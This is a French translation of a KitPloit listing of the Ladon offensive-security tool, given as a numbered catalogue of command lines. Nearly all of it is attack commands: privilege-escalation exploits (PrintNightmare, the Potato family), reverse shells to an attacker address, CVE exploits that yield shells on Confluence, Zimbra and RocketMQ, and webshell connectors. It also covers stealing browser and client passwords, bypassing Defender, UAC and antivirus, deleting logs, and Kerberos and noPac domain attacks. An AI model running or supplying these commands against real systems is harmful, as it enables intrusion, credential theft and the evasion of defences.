root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) exploit d'élévation de privilèges pour la vulnérabilité d'imprimante```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 EXP d'élévation de privilèges via la vulnérabilité SpoolFool de l'imprimante```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem Élévation de privilège System pour exécuter CMD```Bash
Ladon GetSystem cmd.exe
114 Copier le jeton pour exécuter CMD (par exemple, rétrograder les privilèges système vers l'utilisateur actuel de l'exploer)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas Exécuter des commandes en tant qu'utilisateur```Bash
Ladon Runas user pass cmd
116 MS16135 Élévation vers SYSTEM```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato : élévation de privilèges de l'utilisateur du service vers SYSTEM```Bash
Ladon BadPotato cmdline
118 SweetPotato élévation de privilèges de l'utilisateur du service vers SYSTEM```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 élévation de privilèges (du privilège d'utilisateur de service à system)```Bash
Ladon EfsPotato whoami
120 Open3389 : activation en un clic du port 3389```Bash

Ladon Open3389

root@kitploit:~
##### 121 activer l'administrateur intégréAdministrator```Bash
Ladon ActiveAdmin
122 Activer l'utilisateur intégré Guest```Bash

Ladon ActiveGuest

root@kitploit:~
### Shell inversé

##### 123 Shell TCP NC inversé```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 Reverse TCP MSF Shell```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 TCP inverse MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 inverse HTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 Shell HTTPS inversé MSF MET```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 inversé TCP CMD & PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 Reverse UDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh redirection du port local 888 vers le port 22 de 112```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTran port forwarding (exemple 3389)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

Exécution locale

132 Détournement de session de bureau RDP (sans mot de passe)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 Ajouter un élément de démarrage Run dans le registre```Bash
Ladon RegAuto Test c:\123.exe
134 Programme d'exécution du plan AT (sans temps) (privilège système)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 Ajout d'un élément de démarrage et exécutable du service SC(privilège système)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

Détection des informations système

136 Détection du système d'exploitation, des appareils, etc. via le protocole Snmp```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  Détection du nom d'hôte, du domaine et de l'utilisateur Windows via le protocole Nbt```Bash
Ladon 192.168.1.8/24 NbtInfo
138 Détection de la version Windows, du nom d'hôte et du domaine via le protocole Smb```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  Détection de la version Windows, du nom d'hôte et du domaine via le protocole Wmi```Bash
Ladon 192.168.1.8/24 WmiInfo
140 Détection de la version Windows, du nom d'hôte et du domaine via le protocole Mssql```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  Protocole Winrm pour détecter la version de Windows, le nom d'hôte et le domaine```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Exchange : détection de la version Windows, du nom d'hôte et du domaine```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  Détection via le protocole Rdp de la version Windows, du nom d'hôte et du domaine```Bash
Ladon 192.168.1.8/24 RdpInfo

Autres fonctions

144 Win2008 Activation en un clic de .NET 3.5```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 Obtenir le code source HTML d'un site intranet```Bash
Ladon gethtml http://192.168.1.1
146 Serveur Web mini en un clic, serveur Web dédié à l'écoute de pentesting```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
Obtenir l'IP externe (démarrer WEB sur le VPS, la cible accède à ip.txt ou ip.jpg)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt (résultat de l'exploitation sans écho)
##### Écoute```Bash
Ladon web 800
Soumettre et retourner le texte en clair```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Résultat du chiffrement Base64```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Décryptage du résultat Base64```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 Détection du plugin Shiro```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat Supprimer les logs Tomcat pour une IP spécifiée```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 Analyse des plugins d'assemblage personnalisés en C#```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile lit le contenu d'un grand fichier jusqu'à une longueur spécifiée depuis le début```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 Modifier le registre pour lire les mots de passe en clair des systèmes 2012 et ultérieurs```Bash
Ladon SetMzLogonPwd 1
153 Modifier la vérification de signature de détournement de registre```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 Conversion par lots d'IP au format ip24(192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC Conversion par lots d'IP au format C (192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB  Conversion en masse d'IP au format ip B(192.168.)```Bash
Ladon ip.txt IPB
157 Détection de vulnérabilité Atlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134 Shell inverse```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo Détection de certificats d'équipements, IP, noms de domaine, noms de machines, informations d'organisation, etc.```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo Détection en masse de certificats, périphériques, IP, noms de domaine, noms de machine, organisations, etc.```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo Plusieurs méthodes pour obtenir les versions du programme principal, des thèmes et des plugins WordPress```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo - Obtenir en masse les versions du programme principal, des thèmes et des plugins de WordPress```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  Attaque par force brute Exchange  Identifier le cassage de mot de passe Exchange```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 Détection en masse de la vulnérabilité RCE par traversée de répertoire ZIP sur Zimbra```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbra - Exploit de vulnérabilité RCE non autorisée - GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd se connecte à WebShell jsp (supporte cd, k8, ua, uab64)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell affiche les informations de version du système, python, gcc, etc. pour faciliter l'élévation de privilèges.```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd Connexion jsp WebShell (supporte cd, k8, ua, uab64)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 Connexion non interactive à la backdoor IIS-Raid pour exécuter des commandes```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP vérifie si le segment IP apparaît dans les résultats de vulnérabilité```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 Lecture de mot de passe de routeur```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc Détection en masse de vulnérabilité d'exécution de code arbitraire PJL pour imprimante```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 Interroger le fabricant via l'adresse MAC (Ladon Mac MAC地址)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Bruteforce de mots de passe de routeur Cisco VPN(mots de passe par défaut intégrés, prend en charge le texte en clair et Hash)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 détection de la backdoor smiley  10.9 retiré```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan WordPress audit de mots de passe, mots de passe faibles```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Détecter la version d'Exchange```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Détection de vulnérabilité RCE à haut risque Exchange```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Obtenir les en-têtes de réponse HTTP/S d'une page web```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S obtenir les informations d'en-tête de retour de la page Web + code source```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S obtention des noms de domaine d'une page web```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP contourner le CDN pour obtenir l'IP réelle du domaine (caractéristiques uniques de mots-clés telles que nom de domaine, titre, Banner, etc.)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Mots de passe Firefox\Cookies\Lecture de l'historique```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 sans retour prend en charge Win7, Win8, Win11, Win2012\2016\2019, etc. Version 10.8 supprimée```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd prend en charge la lecture des mots de passe de Navicat, TeamView, Xshell, SecureCRT```Bash
Ladon GetPwd
186 DraytekScan - Audit de mots de passe et détection de mots de passe faibles Draytek```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Lecture de mot de passe Xshell```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 écriture non autorisée de SSH-KEY admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  Exécution de commandes à distance SQL Server Version SQL, informations OS xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd Exécution de commandes à distance sur SQL Server, élévation de privilèges efspotato et badpotato```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42 lecture de mot de passe des versions```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan Vérification des mots de passe par défaut du Web pour les routeurs et modems optiques ZTE```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 Lecture du mot de passe du routeur MSNSwitch```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd Lecture du mot de passe du routeur NetGear DGND3700v2```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 Détection de version WebLogic via protocole T3```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

Pénétration en un clic InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan plusieurs modules pour détecter les informations système```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan Détection de multiples vulnérabilités à distance```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan exploitation de multiples vulnérabilités GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 Lecture non autorisée du mot de passe de la base de données du site web```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan Tous les modules```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Détection de la version Citrix Gateway```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 Détection de la version VMware vCenter```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 Contourner Defender pour exécuter PowerShell```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 Redémarrer l'imprimante HP via SNMP```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 Nettoyer les journaux d'opérations Désactiver la journalisation .NET```Bash
Ladon Clslog
206 Détection des hôtes actifs via le protocole ARP```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 Mini serveur FTP,(support des commandes ftp intégrées de windows/Linux pour le téléchargement et l'upload de fichiers)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 Écouter les données de paquets TCP envoyés et sauvegarder TXT et HEX tels que les protocoles SMB RDP HTTP SSH LDAP FTP etc.```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 Écouter les données des paquets UDP et enregistrer en TXT et HEX, comme les protocoles DNS, SNMP, etc.```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward Transfert de ports Relais de ports```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211 CVE-2022-36537	Server Backup Manager  détection de vulnérabilité RCE non autorisée (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper EXP de lecture de fichier non autorisé (默认/WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 Désactiver complètement SMB, désactiver le port 445, bloquer les 0-day, mouvement latéral, attaques par relais, etc.```Bash
Ladon CloseSMB
214 Désactiver un service spécifié```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 Arrêter le service spécifié```Bash
Ladon StopService Spooler
216 Ports autorisés / Ports ouverts```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 bloquer le port intercepter le port```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken Programme de duplication de jetons d'exécution```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 RunSystem Élévation de privilèges - Passage des privilèges administrateur à SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 Réduction de privilèges RunUser : du système à l'utilisateur pour exécuter le programme```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato Escalade de privilèges Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision 海康威视 audit de mots de passe```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision 海康威视 CVE-2017-7921 détection de vulnérabilité```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision 海康威视 Décryptage de fichier de configuration```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladon dédié aux tests CmdShell```Bash
Ladon web 800 cmd
226 dédié aux tests de connexionCmdShell```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 Afficher les administrateurs de domaine```Bash
Ladon QueryAdminDomain
228 Voir les informations du domaine```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 Détection par diffusion du protocole MNDP des informations des routeurs Mikrotik sur le même sous-réseau```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
Outil de connexion PostShell 230, prend en charge la soumission d'en-têtes HTTP personnalisés```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  Exécuter la commande Cmd / prend en charge b64cmd```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 Voir l'IP de l'administrateur, lecture en un clic des journaux de connexion réussie 4624```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 EXP de vulnérabilité d'exécution de commande à distance```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladon outil de contournement antivirus en un clic```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Win11/2022 Élévation de privilèges vers system```Bash	
Ladon McpPotato whoami
236 Conversion EXE en HEX, écriture dans un fichier via commande CMD```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 EXE vers Base64, commande CMD écrire dans un fichier```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Détection de version du système de messagerie Zimbra```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO Outil de pénétration de domaine et de mouvement latéral par stratégie de groupe```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 Obtenir en un clic les informations du site IIS```Bash

Ladon IisInfo

root@kitploit:~
##### 241 Serveur Web dédié à la pénétration - Désérialisation LDAP```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 Serveur WEB dédié à la pénétration - Désérialisation RMI```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 API ajouter un administrateur (ignore la désactivation système de net, net1)```Bash	
Ladon AddAdmin admin$ 123456
244 Ajout d'utilisateur via API (contourne la désactivation système de net, net1.exe)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 API supprimer utilisateur (ignore la désactivation système de net et net1.exe)```Bash	
Ladon DelUser admin$
246 Rubeus Pénétration de domaine attaques Kerberos

par exemple requêtes TGT/requêtes ST/AS-REP Roasting/Kerberoasting/attaques de délégation/Golden Ticket/Silver Ticket/Diamond Ticket/Sapphire Ticket etc.```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac pénétration de domaine escalade de privilèges dans le domaine CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere interagit avec le système d'exploitation invité des machines virtuelles gérées par vCenter  Exécute des commandes```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

